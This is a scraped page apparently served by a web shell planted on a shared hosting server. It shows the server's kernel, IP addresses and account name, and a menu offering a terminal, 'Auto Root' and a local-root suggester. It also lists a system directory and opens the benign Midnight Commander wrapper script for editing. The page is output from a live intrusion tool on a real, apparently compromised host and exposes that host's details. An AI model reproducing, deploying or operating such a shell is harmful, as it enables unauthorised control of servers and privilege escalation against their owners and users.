Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
libexec /
mc /
Delete
Unzip
Name
Size
Permission
Date
Action
ext.d
[ DIR ]
drwxr-xr-x
2024-11-28 20:23
extfs.d
[ DIR ]
drwxr-xr-x
2024-11-28 20:23
fish
[ DIR ]
drwxr-xr-x
2024-11-28 20:23
cons.saver
13.05
KB
-rwxr-xr-x
2019-10-18 20:38
mc-wrapper.csh
410
B
-rw-r--r--
2019-10-18 20:38
mc-wrapper.sh
333
B
-rw-r--r--
2019-10-18 20:38
mc.csh
49
B
-rw-r--r--
2019-10-18 20:38
mc.sh
153
B
-rw-r--r--
2019-10-18 20:38
Save
Rename
MC_USER=`id | sed 's/[^(]*(//;s/).*//'` MC_PWD_FILE="${TMPDIR-/var/tmp}/mc-$MC_USER/mc.pwd.$$" /usr/bin/mc -P "$MC_PWD_FILE" "$@" if test -r "$MC_PWD_FILE"; then MC_PWD="`cat "$MC_PWD_FILE"`" if test -n "$MC_PWD" && test -d "$MC_PWD"; then cd "$MC_PWD" fi unset MC_PWD fi rm -f "$MC_PWD_FILE" unset MC_PWD_FILE unset MC_USER